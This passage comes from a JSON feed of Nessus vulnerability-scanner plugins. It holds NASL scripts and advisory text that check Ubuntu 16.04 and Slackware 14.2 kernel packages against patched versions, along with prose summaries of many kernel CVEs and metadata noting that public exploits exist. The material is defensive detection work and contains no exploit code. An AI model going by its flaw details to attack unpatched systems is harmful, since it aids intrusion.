flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-virtual\", pkgver:\"4.4.0.169.177\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-generic / linux-image-4.4-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:31:33", "description": "Stephan van Schaik, Alyssa Milburn, Sebastian Osterlund, Pietro Frigo, Kaveh Razavi, Herbert Bos, Cristiano Giuffrida, Giorgi Maisuradze, Moritz Lipp, Michael Schwarz, Daniel Gruss, and Jo Van Bulck discovered that Intel processors using Transactional Synchronization Extensions (TSX) could expose memory contents previously stored in microarchitectural buffers to a malicious process that is executing on the same CPU core. A local attacker could use this to expose sensitive information. (CVE-2019-11135)\n\nIt was discovered that the Intel i915 graphics chipsets allowed userspace to modify page table entries via writes to MMIO from the Blitter Command Streamer and expose kernel memory information. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2019-0155)\n\nDeepak Gupta discovered that on certain Intel processors, the Linux kernel did not properly perform invalidation on page table updates by virtual guest operating systems. A local attacker in a guest VM could use this to cause a denial of service (host system crash).\n(CVE-2018-12207)\n\nIt was discovered that the Intel i915 graphics chipsets could cause a system hang when userspace performed a read from GT memory mapped input output (MMIO) when the product is in certain low power states. A local attacker could use this to cause a denial of service.\n(CVE-2019-0154)\n\nHui Peng discovered that the Atheros AR6004 USB Wi-Fi device driver for the Linux kernel did not properly validate endpoint descriptors returned by the device. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15098)\n\nIt was discovered that a buffer overflow existed in the 802.11 Wi-Fi configuration interface for the Linux kernel when handling beacon settings. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-16746)\n\nOri Nimron discovered that the AX25 network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17052)\n\nOri Nimron discovered that the IEEE 802.15.4 Low-Rate Wireless network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17053)\n\nOri Nimron discovered that the Appletalk network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17054)\n\nOri Nimron discovered that the modular ISDN network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17055)\n\nOri Nimron discovered that the Near field Communication (NFC) network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17056)\n\nNico Waisman discovered that a buffer overflow existed in the Realtek Wi-Fi driver for the Linux kernel when handling Notice of Absence frames. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2019-17666)\n\nMaddie Stone discovered that the Binder IPC Driver implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-2215).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-11-13T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : Linux kernel vulnerabilities (USN-4186-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12207", "CVE-2019-0154", "CVE-2019-0155", "CVE-2019-11135", "CVE-2019-15098", "CVE-2019-16746", "CVE-2019-17052", "CVE-2019-17053", "CVE-2019-17054", "CVE-2019-17055", "CVE-2019-17056", "CVE-2019-17666", "CVE-2019-2215"], "modified": "2023-05-11T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-4186-1.NASL", "href": "https://www.tenable.com/plugins/nessus/130966", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4186-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130966);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/11\");\n\n script_cve_id(\"CVE-2018-12207\", \"CVE-2019-0154\", \"CVE-2019-0155\", \"CVE-2019-11135\", \"CVE-2019-15098\", \"CVE-2019-16746\", \"CVE-2019-17052\", \"CVE-2019-17053\", \"CVE-2019-17054\", \"CVE-2019-17055\", \"CVE-2019-17056\", \"CVE-2019-17666\", \"CVE-2019-2215\");\n script_xref(name:\"USN\", value:\"4186-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Ubuntu 16.04 LTS : Linux kernel vulnerabilities (USN-4186-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Stephan van Schaik, Alyssa Milburn, Sebastian Osterlund, Pietro\nFrigo, Kaveh Razavi, Herbert Bos, Cristiano Giuffrida, Giorgi\nMaisuradze, Moritz Lipp, Michael Schwarz, Daniel Gruss, and Jo Van\nBulck discovered that Intel processors using Transactional\nSynchronization Extensions (TSX) could expose memory contents\npreviously stored in microarchitectural buffers to a malicious process\nthat is executing on the same CPU core. A local attacker could use\nthis to expose sensitive information. (CVE-2019-11135)\n\nIt was discovered that the Intel i915 graphics chipsets allowed\nuserspace to modify page table entries via writes to MMIO from the\nBlitter Command Streamer and expose kernel memory information. A local\nattacker could use this to expose sensitive information or possibly\nelevate privileges. (CVE-2019-0155)\n\nDeepak Gupta discovered that on certain Intel processors, the Linux\nkernel did not properly perform invalidation on page table updates by\nvirtual guest operating systems. A local attacker in a guest VM could\nuse this to cause a denial of service (host system crash).\n(CVE-2018-12207)\n\nIt was discovered that the Intel i915 graphics chipsets could cause a\nsystem hang when userspace performed a read from GT memory mapped\ninput output (MMIO) when the product is in certain low power states. A\nlocal attacker could use this to cause a denial of service.\n(CVE-2019-0154)\n\nHui Peng discovered that the Atheros AR6004 USB Wi-Fi device driver\nfor the Linux kernel did not properly validate endpoint descriptors\nreturned by the device. A physically proximate attacker could use this\nto cause a denial of service (system crash). (CVE-2019-15098)\n\nIt was discovered that a buffer overflow existed in the 802.11 Wi-Fi\nconfiguration interface for the Linux kernel when handling beacon\nsettings. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-16746)\n\nOri Nimron discovered that the AX25 network protocol implementation in\nthe Linux kernel did not properly perform permissions checks. A local\nattacker could use this to create a raw socket. (CVE-2019-17052)\n\nOri Nimron discovered that the IEEE 802.15.4 Low-Rate Wireless network\nprotocol implementation in the Linux kernel did not properly perform\npermissions checks. A local attacker could use this to create a raw\nsocket. (CVE-2019-17053)\n\nOri Nimron discovered that the Appletalk network protocol\nimplementation in the Linux kernel did not properly perform\npermissions checks. A local attacker could use this to create a raw\nsocket. (CVE-2019-17054)\n\nOri Nimron discovered that the modular ISDN network protocol\nimplementation in the Linux kernel did not properly perform\npermissions checks. A local attacker could use this to create a raw\nsocket. (CVE-2019-17055)\n\nOri Nimron discovered that the Near field Communication (NFC) network\nprotocol implementation in the Linux kernel did not properly perform\npermissions checks. A local attacker could use this to create a raw\nsocket. (CVE-2019-17056)\n\nNico Waisman discovered that a buffer overflow existed in the Realtek\nWi-Fi driver for the Linux kernel when handling Notice of Absence\nframes. A physically proximate attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2019-17666)\n\nMaddie Stone discovered that the Binder IPC Driver implementation in\nthe Linux kernel contained a use-after-free vulnerability. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2019-2215).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4186-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-17666\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android Binder Use-After-Free Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2023 Canonical, Inc. / NASL script (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-12207\", \"CVE-2019-0154\", \"CVE-2019-0155\", \"CVE-2019-11135\", \"CVE-2019-15098\", \"CVE-2019-16746\", \"CVE-2019-17052\", \"CVE-2019-17053\", \"CVE-2019-17054\", \"CVE-2019-17055\", \"CVE-2019-17056\", \"CVE-2019-17666\", \"CVE-2019-2215\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-4186-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1062-kvm\", pkgver:\"4.4.0-1062.69\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1098-aws\", pkgver:\"4.4.0-1098.109\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-168-generic\", pkgver:\"4.4.0-168.197\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-168-generic-lpae\", pkgver:\"4.4.0-168.197\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-168-lowlatency\", pkgver:\"4.4.0-168.197\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-aws\", pkgver:\"4.4.0.1098.102\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic\", pkgver:\"4.4.0.168.176\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.4.0.168.176\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-kvm\", pkgver:\"4.4.0.1062.62\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.4.0.168.176\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-virtual\", pkgver:\"4.4.0.168.176\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-aws / linux-image-4.4-generic / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:31:46", "description": "New kernel packages are available for Slackware 14.2 to fix security issues.", "cvss3": {}, "published": "2019-11-08T00:00:00", "type": "nessus", "title": "Slackware 14.2 : Slackware 14.2 kernel (SSA:2019-311-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10905", "CVE-2016-10906", "CVE-2018-20976", "CVE-2019-10638", "CVE-2019-14814", "CVE-2019-14816", "CVE-2019-14821", "CVE-2019-14835", "CVE-2019-15098", "CVE-2019-15117", "CVE-2019-15118", "CVE-2019-15505", "CVE-2019-16746", "CVE-2019-17052", "CVE-2019-17053", "CVE-2019-17054", "CVE-2019-17055", "CVE-2019-17056", "CVE-2019-17075", "CVE-2019-17133", "CVE-2019-2215", "CVE-2019-3900"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:kernel-generic", "p-cpe:/a:slackware:slackware_linux:kernel-generic-smp", "p-cpe:/a:slackware:slackware_linux:kernel-headers", "p-cpe:/a:slackware:slackware_linux:kernel-huge", "p-cpe:/a:slackware:slackware_linux:kernel-huge-smp", "p-cpe:/a:slackware:slackware_linux:kernel-modules", "p-cpe:/a:slackware:slackware_linux:kernel-modules-smp", "p-cpe:/a:slackware:slackware_linux:kernel-source", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2019-311-01.NASL", "href": "https://www.tenable.com/plugins/nessus/130751", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2019-311-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130751);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2016-10905\", \"CVE-2016-10906\", \"CVE-2018-20976\", \"CVE-2019-10638\", \"CVE-2019-14814\", \"CVE-2019-14816\", \"CVE-2019-14821\", \"CVE-2019-14835\", \"CVE-2019-15098\", \"CVE-2019-15117\", \"CVE-2019-15118\", \"CVE-2019-15505\", \"CVE-2019-16746\", \"CVE-2019-17052\", \"CVE-2019-17053\", \"CVE-2019-17054\", \"CVE-2019-17055\", \"CVE-2019-17056\", \"CVE-2019-17075\", \"CVE-2019-17133\", \"CVE-2019-2215\", \"CVE-2019-3900\");\n script_xref(name:\"SSA\", value:\"2019-311-01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Slackware 14.2 : Slackware 14.2 kernel (SSA:2019-311-01)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"New kernel packages are available for Slackware 14.2 to fix security\nissues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2019&m=slackware-security.756390\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c772912b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android Binder Use-After-Free Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kernel-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kernel-generic-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kernel-huge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kernel-huge-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kernel-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kernel-modules-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.2\", pkgname:\"kernel-generic\", pkgver:\"4.4.199\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.2\", pkgname:\"kernel-generic-smp\", pkgver:\"4.4.199_smp\", pkgarch:\"i686\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.2\", pkgname:\"kernel-headers\", pkgver:\"4.4.199_smp\", pkgarch:\"x86\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.2\", pkgname:\"kernel-huge\", pkgver:\"4.4.199\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.2\", pkgname:\"kernel-huge-smp\", pkgver:\"4.4.199_smp\", pkgarch:\"i686\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.2\", pkgname:\"kernel-modules\", pkgver:\"4.4.199\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.2\", pkgname:\"kernel-modules-smp\", pkgver:\"4.4.199_smp\", pkgarch:\"i686\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.2\", pkgname:\"kernel-source\", pkgver:\"4.4.199_smp\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"kernel-generic\", pkgver:\"4.4.199\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"kernel-headers\", pkgver:\"4.4.199\", pkgarch:\"x86\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"kernel-huge\", pkgver:\"4.4.199\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"kernel-modules\", pkgver:\"4.4.199\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"kernel-source\", pkgver:\"4.4.199\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:32:04", "description": "According to the versions of the kernel packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system:\n memory allocation, process allocation, device input and output, etc.Security Fix(es):Linux kernel CIFS implementation, version 4.9.0 is vulnerable to a relative paths injection in directory entry lists.(CVE-2019-10220)A memory leak in the i2400m_op_rfkill_sw_toggle() function in drivers/ net/wimax/i2400m/op-rfkill.c in the Linux kernel before 5.3.11 allows attackers to cause a denial of service (memory consumption), aka CID-6f3ef5c25cc7.(CVE-2019-19051)A memory leak in the sdma_init() function in drivers/infiniband/hw/hfi1/sdma.c in the Linux kernel before 5.3.9 allows attackers to cause a denial of service (memory consumption) by triggering rhashtable_init() failures, aka CID-34b3be18a04e.(CVE-2019-19065)Four memory leaks in the acp_hw_init() function in drivers/gpu/drm/amd/amdgpu/amdgpu_acp.c in the Linux kernel before 5.3.8 allow attackers to cause a denial of service (memory consumption) by triggering mfd_add_hotplug_devices() or pm_genpd_add_device() failures, aka CID-57be09c6e874. NOTE: third parties dispute the relevance of this because the attacker must already have privileges for module loading.(CVE-2019-19067)An issue was discovered in drivers/xen/balloon.c in the Linux kernel before 5.2.3, as used in Xen through 4.12.x, allowing guest OS users to cause a denial of service because of unrestricted resource consumption during the mapping of guest memory, aka CID-6ef36ab967c7.(CVE-2019-17351)The xen_biovec_phys_mergeable function in drivers/xen/biomerge.c in Xen might allow local OS guest users to corrupt block device data streams and consequently obtain sensitive memory information, cause a denial of service, or gain host OS privileges by leveraging incorrect block IO merge-ability calculation.(CVE-2017-12134)In the Linux kernel before 5.3.7, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/misc/adutux.c driver, aka CID-44efc269db79.(CVE-2019-19523)In the Linux kernel before 5.3.7, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/misc/iowarrior.c driver, aka CID-edc4746f253d.(CVE-2019-19528)In the Linux kernel before 5.2.10, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/class/cdc-acm.c driver, aka CID-c52873e5a1ef.(CVE-2019-19530)In the Linux kernel before 5.3.4, there is an info-leak bug that can be caused by a malicious USB device in the drivers/media/usb/ttusb-dec/ttusb_dec.c driver, aka CID-a10feaf8c464.(CVE-2019-19533)In the Linux kernel before 5.2.10, there is a race condition bug that can be caused by a malicious USB device in the USB character device driver layer, aka CID-303911cfc5b9.\n This affects drivers/usb/core/file.c.(CVE-2019-19537)In the Linux kernel before 5.3.12, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/input/ff-memless.c driver, aka CID-fa3a5a1880c9.(CVE-2019-19524)In the Linux kernel before 5.2.10, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/hid/usbhid/hiddev.c driver, aka CID-9c09b214f30e.(CVE-2019-19527)In the Linux kernel before 5.3.9, there are multiple out-of-bounds write bugs that can be caused by a malicious USB device in the Linux kernel HID drivers, aka CID-d9d4b1e46d95.\n This affects drivers/hid/hid-axff.c, drivers/hid/hid-dr.c, drivers/hid/hid-emsff.c, drivers/hid/hid-gaff.c, drivers/hid/hid-holtekff.c, drivers/hid/hid-lg2ff.c, drivers/hid/hid-lg3ff.c, drivers/hid/hid-lg4ff.c, drivers/hid/hid-lgff.c, drivers/hid/hid-logitech-hidpp.c, drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c, drivers/hid/hid-tmff.c, and drivers/hid/hid-zpff.c.(CVE-2019-19532)The VFS subsystem in the Linux kernel 3.x provides an incomplete set of requirements for setattr operations that underspecifies removing extended privilege attributes, which allows local users to cause a denial of service (capability stripping) via a failed invocation of a system call, as demonstrated by using chown to remove a capability from the ping or Wireshark dumpcap program.(CVE-2015-1350)In the Linux kernel before 5.2.9, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/misc/yurex.c driver, aka CID-fc05481b2fca.(CVE-2019-19531)The Linux kernel through 5.3.13 has a start_offset+size Integer Overflow in cpia2_remap_buffer in drivers/media/usb/cpia2/cpia2_core.c because cpia2 has its own mmap implementation. This allows local users (with /dev/video0 access) to obtain read and write permissions on kernel physical pages, which can possibly result in a privilege escalation.(CVE-2019-18675)A flaw was found in the way signature calculation was handled by cephx authentication protocol. An attacker having access to ceph cluster network who is able to alter the message payload was able to bypass signature checks done by cephx protocol. Ceph branches master, mimic, luminous and jewel are believed to be vulnerable.(CVE-2018-1129)A memory leak in the alloc_sgtable() function in driverset/wireless/intel/iwlwifi/fw/dbg.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering alloc_page() failures, aka CID-b4b814fec1a5.(CVE-2019-19058)A memory leak in the ath9k_wmi_cmd() function in driverset/wireless/ath/ath9k/wmi.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption), aka 